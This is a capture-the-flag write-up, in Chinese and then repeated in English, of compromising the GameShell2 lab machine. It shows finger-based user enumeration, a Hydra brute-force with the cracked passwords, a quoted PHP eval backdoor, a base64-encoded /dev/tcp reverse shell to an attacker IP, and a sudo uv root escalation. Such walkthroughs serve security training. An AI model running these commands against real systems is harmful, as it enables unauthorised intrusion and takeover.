本文记录了对 GameShell2 靶机的渗透全过程。首先通过目录扫描发现网站用户列表与 /terminal 认证接口，巧妙结合 79 端口的 Finger 服务枚举出有效用户 dt，并利用 Hydra 成功爆破出 Web 登录凭据。随后在配置中发现隐藏站点 dev.astra.dsz 及后门文件 backdoor.php，借助 phpsploit 工具连接后，执行 Base64 编码的反弹 Shell 载荷获取初始权限。最后，通过 sudo -l 发现 www-data 用户可免密执行 /usr/local/bin/uv，直接运行 bash 成功提权至 root。 This document records the entire penetration process of the GameShell2 target machine. First, directory scanning revealed a website user list and the /terminal authentication interface. By cleverly combining this with the Finger service on port 79, the valid user 'dt' was enumerated, and Hydra was used to successfully brute-force the web login credentials. Subsequently, a hidden site dev.astra.dsz and a backdoor file backdoor.php were discovered in the configuration. After connecting using the phpsploit tool, a Base64-encoded reverse shell payload was executed to gain initial access. Finally, through 'sudo -l', it was found that the www-data user could execute /usr/local/bin/uv without a password. Running bash directly successfully escalated privileges to root.

枚举

# Nmap 7.95 scan initiated Thu Dec 11 07:38:55 2025 as: /usr/lib/nmap/nmap --privileged -T4 --open -Pn -sV -v -oN nmap 192.168.110.17
Nmap scan report for GameShell2.lan (192.168.110.17)
Host is up (0.00019s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
79/tcp open  finger  OpenBSD fingerd (ported to Linux)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
MAC Address: 08:00:27:9A:11:EA (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: GameShell2; OSs: Linux, Linux 4.19.0-27-amd64; CPE: cpe:/o:linux:linux_kernel, cpe:/o:linux:linux_kernel:4.19.0-27-amd64

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 11 07:39:07 2025 -- 1 IP address (1 host up) scanned in 11.96 seconds

网站

$ gobuster dir -u http://192.168.110.17 -w /usr/share/wordlists/dirb/common.txt -x txt,php,html,bak                                                   
===============================================================             
Gobuster v3.8                                                               
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)               
===============================================================
[+] Url:                     http://192.168.110.17                          
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt           
[+] Negative Status codes:   404                                            
[+] User Agent:              gobuster/3.8
[+] Extensions:              html,bak,txt,php
[+] Timeout:                 10s                                            
===============================================================             
Starting gobuster in directory enumeration mode                             
===============================================================             
/.hta.html            (Status: 403) [Size: 279]
/.hta.bak             (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.hta.php             (Status: 403) [Size: 279]        
/.hta.txt             (Status: 403) [Size: 279]
/.hta                 (Status: 403) [Size: 279]
/.htaccess.php        (Status: 403) [Size: 279]
/.htaccess.html       (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htaccess.bak        (Status: 403) [Size: 279]
/.htpasswd.txt        (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htpasswd.html       (Status: 403) [Size: 279]
/.htpasswd.bak        (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 14134]
/index.html           (Status: 200) [Size: 14134]
/robots.txt           (Status: 200) [Size: 35]
/robots.txt           (Status: 200) [Size: 35]
/server-status        (Status: 403) [Size: 279]
/terminal             (Status: 401) [Size: 461]
/users.html           (Status: 200) [Size: 2052]

wget http://192.168.110.17/users.html

for user in $(cat valid_users_list.txt); do
	result=$(finger $user@192.168.110.17 2>&1 | grep "Login:")
	if [ -n "$result" ]; then
	echo "找到有效用户: $user"
  echo "$result"
  break
  fi
done

hydra -l dt -P /usr/share/wordlists/rockyou.txt -f 192.168.110.17 http-get /terminal

—>dt:purple1

玩完游戏得到dt:0t4tdtlt

发现/var/www还有一个dev，所以可能存在另一个网站

查看/etc/apache2/sites-available/dev.astra.dsz.conf

ffuf得到backdoor.php

python3 phpsploit

hpsploit > set TARGET http://dev.astra.dsz/backdoor.php
phpsploit > exploit
[*] Current backdoor is: <?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

[*] Sending payload to http://dev.astra.dsz:80/backdoor.php ...
[*] Shell obtained by PHP (127.0.0.1 -> 127.0.0.1)

Connected to Linux server (dev.astra.dsz)
running PHP 8.3.19 on Apache/2.4.62 (Debian)
phpsploit(dev.astra.dsz) > ls

Listing: /var/www/dev
=====================

Mode        Owner     Group     Size  Last Modified                   Name        
----        -----     -----     ----  -------------                   ----        
drwx------  www-data  www-data  4K    Fri Nov 21 11:49:56 +0000 2025  .
drwxr-xr-x  root      root      4K    Fri Nov 21 08:04:51 +0000 2025  ..
-rw-r--r--  root      root      44    Fri Nov 21 08:02:19 +0000 2025  backdoor.php
-rw-r--r--  root      root      68    Fri Nov 21 11:49:56 +0000 2025  index.html  

phpsploit(dev.astra.dsz) > printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC4xMTAuMTQxLzQ0NDQgMD4mMSkgJg==|base64 -d|bash
[-] Unknown Command: printf (use `run` plugin to run remote command)
[-] Unknown Command: | (use `run` plugin to run remote command)
[-] Unknown Command: base64 (use `run` plugin to run remote command)
[-] Unknown Command: | (use `run` plugin to run remote command)
[-] Unknown Command: bash (use `run` plugin to run remote command)
phpsploit(dev.astra.dsz) > run 'printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC4xMTAuMTQxLzQ0NDQgMD4mMSkgJg==|base64 -d|bash'
phpsploit(dev.astra.dsz) >

权限提升

www-data@GameShell2:/var/www$ sudo -l
Matching Defaults entries for www-data on GameShell2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on GameShell2:
    (ALL) NOPASSWD: /usr/local/bin/uv
www-data@GameShell2:/var/www$ sudo /usr/local/bin/uv run /bin/bash
root@GameShell2:/var/www# cat /root/root.txt
flag{root-983b0f2b5412aadd94ed08f249355686}

Enumeration

# Nmap 7.95 scan initiated Thu Dec 11 07:38:55 2025 as: /usr/lib/nmap/nmap --privileged -T4 --open -Pn -sV -v -oN nmap 192.168.110.17
Nmap scan report for GameShell2.lan (192.168.110.17)
Host is up (0.00019s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
79/tcp open  finger  OpenBSD fingerd (ported to Linux)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
MAC Address: 08:00:27:9A:11:EA (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: GameShell2; OSs: Linux, Linux 4.19.0-27-amd64; CPE: cpe:/o:linux:linux_kernel, cpe:/o:linux:linux_kernel:4.19.0-27-amd64

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 11 07:39:07 2025 -- 1 IP address (1 host up) scanned in 11.96 seconds

Website

$ gobuster dir -u http://192.168.110.17 -w /usr/share/wordlists/dirb/common.txt -x txt,php,html,bak                                                   
===============================================================             
Gobuster v3.8                                                               
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)               
===============================================================
[+] Url:                     http://192.168.110.17                          
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt           
[+] Negative Status codes:   404                                            
[+] User Agent:              gobuster/3.8
[+] Extensions:              html,bak,txt,php
[+] Timeout:                 10s                                            
===============================================================             
Starting gobuster in directory enumeration mode                             
===============================================================             
/.hta.html            (Status: 403) [Size: 279]
/.hta.bak             (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.hta.php             (Status: 403) [Size: 279]        
/.hta.txt             (Status: 403) [Size: 279]
/.hta                 (Status: 403) [Size: 279]
/.htaccess.php        (Status: 403) [Size: 279]
/.htaccess.html       (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htaccess.bak        (Status: 403) [Size: 279]
/.htpasswd.txt        (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htpasswd.html       (Status: 403) [Size: 279]
/.htpasswd.bak        (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 14134]
/index.html           (Status: 200) [Size: 14134]
/robots.txt           (Status: 200) [Size: 35]
/robots.txt           (Status: 200) [Size: 35]
/server-status        (Status: 403) [Size: 279]
/terminal             (Status: 401) [Size: 461]
/users.html           (Status: 200) [Size: 2052]

wget http://192.168.110.17/users.html

for user in $(cat valid_users_list.txt); do
	result=$(finger $user@192.168.110.17 2>&1 | grep "Login:")
	if [ -n "$result" ]; then
	echo "Found valid user: $user"
  echo "$result"
  break
  fi
done

hydra -l dt -P /usr/share/wordlists/rockyou.txt -f 192.168.110.17 http-get /terminal

-->dt:purple1

After playing the game, get dt:0t4tdtlt

Found another 'dev' in /var/www, so there might be another website

Check /etc/apache2/sites-available/dev.astra.dsz.conf

ffuf found backdoor.php

python3 phpsploit

phpsploit > set TARGET http://dev.astra.dsz/backdoor.php
phpsploit > exploit
[*] Current backdoor is: <?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

[*] Sending payload to http://dev.astra.dsz:80/backdoor.php ...
[*] Shell obtained by PHP (127.0.0.1 -> 127.0.0.1)

Connected to Linux server (dev.astra.dsz)
running PHP 8.3.19 on Apache/2.4.62 (Debian)
phpsploit(dev.astra.dsz) > ls

Listing: /var/www/dev
=====================

Mode        Owner     Group     Size  Last Modified                   Name        
----        -----     -----     ----  -------------                   ----        
drwx------  www-data  www-data  4K    Fri Nov 21 11:49:56 +0000 2025  .
drwxr-xr-x  root      root      4K    Fri Nov 21 08:04:51 +0000 2025  ..
-rw-r--r--  root      root      44    Fri Nov 21 08:02:19 +0000 2025  backdoor.php
-rw-r--r--  root      root      68    Fri Nov 21 11:49:56 +0000 2025  index.html  

phpsploit(dev.astra.dsz) > printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC4xMTAuMTQxLzQ0NDQgMD4mMSkgJg==|base64 -d|bash
[-] Unknown Command: printf (use `run` plugin to run remote command)
[-] Unknown Command: | (use `run` plugin to run remote command)
[-] Unknown Command: base64 (use `run` plugin to run remote command)
[-] Unknown Command: | (use `run` plugin to run remote command)
[-] Unknown Command: bash (use `run` plugin to run remote command)
phpsploit(dev.astra.dsz) > run 'printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC4xMTAuMTQxLzQ0NDQgMD4mMSkgJg==|base64 -d|bash'
phpsploit(dev.astra.dsz) >

Privilege Escalation

www-data@GameShell2:/var/www$ sudo -l
Matching Defaults entries for www-data on GameShell2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on GameShell2:
    (ALL) NOPASSWD: /usr/local/bin/uv
www-data@GameShell2:/var/www$ sudo /usr/local/bin/uv run /bin/bash
root@GameShell2:/var/www# cat /root/root.txt
flag{root-983b0f2b5412aadd94ed08f249355686}